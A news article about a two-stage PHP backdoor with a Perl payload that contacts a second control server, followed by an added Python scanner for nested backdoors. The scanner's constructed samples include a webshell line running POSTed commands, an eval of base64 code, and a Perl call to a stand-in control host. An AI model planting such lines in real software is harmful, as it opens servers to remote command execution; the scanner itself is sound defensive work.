Major PHP double backdoor security flaw discovered

A malicious PHP script carrying two backdoors, one hidden inside the other, has been discovered, leading some security experts to warn of the threat it poses to PHP-hosted websites and their visitors.

Andrew Brandt, Lead Threat Analyst at security firm Webroot, found the backdoor a few days ago and, to his surprise, then found a second backdoor buried deep within the first. “Someone’s bugged this bug with another bug,” he said in an interview with DaniWeb.

Visitors who load a website in which the PHP code has been embedded risk picking up a pretty nasty Trojan. “The code is nicely appointed with such desirable features as the ability to execute shell commands on the host server, send a flood of data packets at another computer, and scan remote computers,” said Brandt.

The script is written so that the PHP bot loads a set of commands written in Perl, which contact a different control server, one operated by a separate group of hackers from the first. In effect, a new group of hackers is using an old group’s code and distribution network to spread a completely new payload.
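To make the two-stage structure concrete, here is an added example of a small heuristic scanner for PHP files; it is not code from the article, DaniWeb or Webroot, and the sample files, hostnames (`c2-one.example`, `c2-two.example`) and the `/tmp/.x.pl` path are constructed for the demo. It flags the building blocks the article attributes to the bot (shell-command execution, a control-server URL, a Perl helper) and, because the second backdoor was buried inside the first, it decodes base64 blobs and rescans them so a stage hidden inside another stage is reported with its own depth.

```python
"""Heuristic scanner for nested (multi-stage) PHP backdoors.

Added example, not code from the article or Webroot. Every sample file,
hostname and path below is constructed for the demo.
"""
import base64
import re

SHELL_FUNCS = ("shell_exec", "passthru", "proc_open", "popen", "system", "exec")
EVAL_FUNCS = ("eval", "assert", "create_function")
DECODE_FUNCS = ("base64_decode", "gzinflate", "str_rot13")

CALL_RE = re.compile(
    r"\b(" + "|".join(SHELL_FUNCS + EVAL_FUNCS + DECODE_FUNCS) + r")\s*\(",
    re.IGNORECASE,
)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # long base64-looking runs
URL_RE = re.compile(r"https?://[^\s'\"<>]+")        # candidate control servers
PERL_RE = re.compile(r"\bperl\b", re.IGNORECASE)    # second-stage interpreter


def _kind(func):
    f = func.lower()
    if f in SHELL_FUNCS:
        return "shell-call"
    if f in EVAL_FUNCS:
        return "eval-call"
    return "decode-call"


def scan_php(text, stage=0, max_stage=4):
    """Return findings as dicts; 'stage' is the nesting depth they were found at."""
    findings = []
    for m in CALL_RE.finditer(text):
        findings.append({"stage": stage, "kind": _kind(m.group(1)), "value": m.group(1)})
    for m in URL_RE.finditer(text):
        findings.append({"stage": stage, "kind": "c2-url", "value": m.group(0)})
    if PERL_RE.search(text):
        findings.append({"stage": stage, "kind": "perl", "value": "perl"})
    if stage >= max_stage:
        return findings
    # Decode every base64-looking blob; if it yields readable text, treat it as
    # an embedded stage and scan it recursively one level deeper.
    for blob in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if not all(c.isprintable() or c in "\r\n\t" for c in decoded):
            continue
        findings.append({"stage": stage, "kind": "encoded-stage", "value": blob[:16] + "..."})
        findings.extend(scan_php(decoded, stage + 1, max_stage))
    return findings


def report(text):
    """Summarise a scan: number of stages, control servers seen, and a verdict."""
    findings = scan_php(text)
    kinds = {f["kind"] for f in findings}
    if "shell-call" in kinds and ({"eval-call", "c2-url"} & kinds):
        verdict = "backdoor"
    elif kinds & {"shell-call", "eval-call", "encoded-stage"}:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "stages": 1 + max((f["stage"] for f in findings), default=-1),
        "c2": sorted(f["value"] for f in findings if f["kind"] == "c2-url"),
        "verdict": verdict,
    }


# Constructed samples (not real malware): a benign page and a two-stage bot.
CLEAN_PHP = "<?php echo htmlspecialchars($_GET['name'] ?? ''); ?>"

# Stage 2 (hypothetical): a Perl helper that talks to a second control server.
STAGE2 = '$h = "perl /tmp/.x.pl http://c2-two.example/cmd"; passthru($h);'
STAGE2_B64 = base64.b64encode(STAGE2.encode()).decode()

# Stage 1 (hypothetical): a PHP bot that runs operator commands and unpacks
# stage 2 at runtime, so a plain grep for "perl" on the file finds nothing.
BOT_PHP = (
    "<?php\n"
    "$c2 = 'http://c2-one.example/gate.php';\n"
    "if (isset($_POST['c'])) { echo shell_exec($_POST['c']); }\n"
    "eval(base64_decode('" + STAGE2_B64 + "'));\n"
)

if __name__ == "__main__":
    for name, src in (("clean.php", CLEAN_PHP), ("bot.php", BOT_PHP)):
        print(name, report(src))
```

Run it over a web root with `scan_php(open(path).read())` per file; the point of the recursion is that the second stage's Perl helper and second control server only appear at stage 1, which a scanner that stops at the outer file would never report. Heuristics like these produce false positives on legitimate admin tooling, so treat a "backdoor" verdict as a lead to inspect, not proof.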

“PHP can and has been used as a tool for malicious activity, just like JavaScript. PHP backdoors, bots, and download code have been part of the threat landscape for some time. There are hundreds of different bots, backdoors, and other malicious server-side PHP code floating around,” said Brandt.

“But this isn’t a problem with PHP, inherently, just as Windows malware isn’t a C++ or Delphi problem. Malicious people will use whatever tools are at their disposal to engage in malicious activity. PHP happens to be a particularly powerful and useful tool, but whether one uses it for good or evil depends on the human doing the coding at the keyboard,” he continued.

Brandt said that the people at risk from this malware are the owners and operators of websites using PHP, the web hosting companies keeping those websites online, and the “hapless web surfers” who visit them. He said that stronger password policies, requiring more complex passwords that are changed regularly, are essential to mitigating some of the potential damage.

“Web surfers should protect themselves by using current, up-to-date antivirus, as well as some sort of scripting controls on their browser,” said Brandt. He also recommended the Firefox add-on NoScript, which blocks website scripts from running without the user’s permission and so could prevent infection from untrustworthy websites.